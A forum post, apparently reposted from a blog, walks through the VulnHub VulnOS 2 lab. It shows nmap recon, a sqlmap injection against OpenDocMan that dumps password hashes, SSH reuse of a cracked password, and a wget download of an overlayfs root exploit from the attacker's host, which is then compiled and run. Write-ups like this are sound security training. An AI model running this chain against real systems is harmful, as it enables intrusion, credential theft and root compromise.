[VulnHub] VulnOS 2 - Solution

ctf
vulnhub
webhacking
linux

(John Marston) #1

This is my solution to the Vuln OS 2 challenge by c4b3rw0lf.

Let’s get started:

We were not provided with any logon credentials for the VM so I could not simply login to check the IP address of the target machine (unless I cheated by altering grub). So, the first step was finding the IP address.

    [email protected]:~# netdiscover -i eth0 -r 10.0.2.0/24
    
    Currently scanning: Finished!   |   Screen View: Unique Hosts                 
    
    1 Captured ARP Req/Rep packets, from 1 hosts.   Total size: 60                
    _____________________________________________________________________________
    IP            At MAC Address      Count  Len   MAC Vendor                   
    ----------------------------------------------------------------------------- 
    10.0.2.7        08:00:27:43:dc:89    01    060   CADMUS COMPUTER SYSTEMS   

I know that my Kali machine and the target VM are the only machines on the virtual network, so that has to be it. Now that I know the IP of my target, I can perform some more recon using NMAP.

    [email protected]:~# nmap -n -sT -A -T4 10.0.2.7
    
    Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-05-25 11:20 CDT
    Nmap scan report for 10.0.2.7
    Host is up (0.00060s latency).
    Not shown: 997 closed ports
    PORT     STATE SERVICE VERSION
    22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   1024 f5:4d:c8:e7:8b:c1:b2:11:95:24:fd:0e:4c:3c:3b:3b (DSA)
    |   2048 ff:19:33:7a:c1:ee:b5:d0:dc:66:51:da:f0:6e:fc:48 (RSA)
    |_  256 ae:d7:6f:cc:ed:4a:82:8b:e8:66:a5:11:7a:11:5f:86 (ECDSA)
    80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
    |_http-server-header: Apache/2.4.7 (Ubuntu)
    |_http-title: VulnOSv2
    6667/tcp open  irc     ngircd
    MAC Address: 08:00:27:43:DC:89 (Cadmus Computer Systems)
    Device type: general purpose
    Running: Linux 3.X
    OS CPE: cpe:/o:linux:linux_kernel:3
    OS details: Linux 3.2 - 3.19
    Network Distance: 1 hop
    Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Looks like we have SSH, a webserver running, and an IRC server. Let’s checkout the webserver first.

Initially, I tried to enumerate some common directories using dirb but nothing of interest came up. Upon accessing the website, we are given some instructions and a link to /jabc

    ### Pentest the company website on the server... Get root of the system and read the final flag ###

Following the link, we are presented with a new webpage with a lot more options. It took me longer than I would like to admit but I finally found something interesting at /jabc/?q=node/7.

It looks like a blank page but a ctrl+a highlights the hidden text and we are given yet another message and a link to follow.

    Dear customer,
    
    For security reasons, this section is hidden.
    
    For a detailed view and documentation of our products, please visit our documentation platform at /jabcd0cs/ on  the server. Just login with guest/guest
    
    Thank you.

Navigating to /jabcd0cs/ presents us a login panel. We were given the credentials of guest/guest in the hidden message so let’s use those. Once logged in, I noticed you could upload files at /jabcd0cs/add.php. I poked around trying to exploit what I thought would be an Unrestricted File Upload vulnerability, but it got me nowhere.

I eventually noticed that the website was powered by OpenDocMan version 1.2.7. A quick google search led me here

    OpenDocMan 1.2.7 Multiple Vulnerabilities
    https://www.exploit-db.com/exploits/32075/

Reading over the report, I discover that this version of OpenDocMan has a SQL Injection vulnerability! The “add_value” parameter of “/ajax_udf.php” is not properly sanitized. I fired up SQLMap and managed to steal the hashed password of the admin (ignore the [email protected][.]com. that was me registering an account).

    sqlmap -u "http://10.0.2.7/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -p add_value -D jabcd0cs -T odm_user -C  Email,password,username --dump
    
    Database: jabcd0cs
    Table: odm_user
    [3 entries]
    +--------------------+----------------------------------+----------+
    | Email              | password                         | username |
    +--------------------+----------------------------------+----------+
    | [email protected] | b78aae356709f8c31118ea613980954b | webmin   |
    | [email protected]  | 084e0343a0486ff05530df6c705c8bb4 | guest    |
    | [email protected]   | 286755fad04869ca523320acce0dc6a4 |[redacted]|
    +--------------------+----------------------------------+----------+
    

Using SQLMap, I also discovered that the MySQL database was running as root :slight_smile:

After cracking the webmin hash, I discover that the password is webmin1980. Remember we found that SSH was running? Let’s see if we can reuse credentials:

    [email protected]:~# ssh [email protected]
    [email protected]'s password: 
    Welcome to Ubuntu 14.04.4 LTS (GNU/Linux 3.13.0-24-generic i686)
    
    * Documentation:  https://help.ubuntu.com/
    
    System information as of Wed May 25 17:37:20 CEST 2016
    
    System load:  0.0               Processes:           87
    Usage of /:   5.8% of 29.91GB   Users logged in:     0
    Memory usage: 14%               IP address for eth0: 10.0.2.7
    Swap usage:   0%
    
    Graph this data and manage this system at:
    https://landscape.canonical.com/
    
    Last login: Wed May 25 17:37:20 2016 from 10.0.2.3
    $ bash
    [email protected]:~$

We can! After doing a bit of recon on the box, I didn’t find anything worth while. However, this machine is running a vulnerable version of Ubuntu:

    [email protected]:~$ uname -a
    Linux VulnOSv2 3.13.0-24-generic #47-Ubuntu SMP Fri May 2 23:31:42 UTC 2014 i686 i686 i686 GNU/Linux

Let’s go back to Kali and see what we can find:

    [email protected]:~# searchsploit Ubuntu 14
    --------------------------------------------- ----------------------------------
     Exploit Title                               |  Path
                                                 | (/usr/share/exploitdb/platforms)
    --------------------------------------------- ----------------------------------
    Ubuntu PAM MOTD File Tampering (Privilege Es | ./linux/local/14273.sh
    Ubuntu PAM 1.1.0 MOTD - Local Root Exploit   | ./linux/local/14339.sh
    Ubuntu 10.04 LTS - Lucid Lynx ftp Client 0.1 | ./linux/dos/14452.txt
    Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37292.c
    Ubuntu 12.04_ 14.04_ 14.10_ 15.04 - overlayf | ./linux/local/37293.txt
    --------------------------------------------- ----------------------------------

Looks like we may have found a local root exploit for Ubuntu 14.04, let’s check it out:

    [email protected]:/usr/share/exploitdb/platforms/linux/local# cat 37293.txt 
    The overlayfs filesystem does not correctly check file permissions when
    creating new files in the upper filesystem directory. This can be exploited
    by an unprivileged process in kernels with CONFIG_USER_NS=y and where
    overlayfs has the FS_USERNS_MOUNT flag, which allows the mounting of overlayfs
    inside unprivileged mount namespaces. This is the default configuration of
    Ubuntu 12.04, 14.04, 14.10, and 15.04 [1].

Hm, our target is running Ubuntu 14.04 and is more than likely unpatched. Let’s get the exploit on the target machine, compile it, and run it:

    [email protected]:~# service apache2 start
    [email protected]:~# cp /usr/share/exploitdb/platforms/linux/local/37292.c /var/www/html/

Here, I started up my own webserver and copied the exploit into my document root. This way, I can use wget and download the file from the target machine.

    [email protected]:~$ wget http://10.0.2.3/37292.c
    --2016-05-25 18:54:05--  http://10.0.2.3/37292.c
    Connecting to 10.0.2.3:80... connected.
    HTTP request sent, awaiting response... 200 OK
    Length: 5123 (5.0K) [text/x-csrc]
    Saving to: ‘37292.c’
    
    100%[======================================>] 5,123       --.-K/s   in 0s      
    
    2016-05-25 18:54:05 (298 MB/s) - ‘37292.c’ saved [5123/5123]

Got it! Let’s compile it and cross our fingers:

    [email protected]:~$ gcc 37292.c 
    [email protected]:~$ ./a.out 
    spawning threads
    mount #1
    mount #2
    child threads done
    /etc/ld.so.preload created
    creating shared library
    # whoami
    root
    # cd /root
    # ls
    flag.txt
    # cat flag.txt
    Hello and welcome.
    You successfully compromised the company "JABC" and the server completely !!
    Congratulations !!!
    Hope you enjoyed it.
    
    What do you think of A.I.?
    

We completed the challenge! I had quite a bit of fun with this one, wasn’t too difficult. I definitely could have saved myself some time if I had done more recon from the start. I recommend this to anyone looking to get started in boot2root challeneges.

SOURCE:
My Blog
Proof that it’s my blog


(system) #2

This topic was automatically closed after 30 days. New replies are no longer allowed.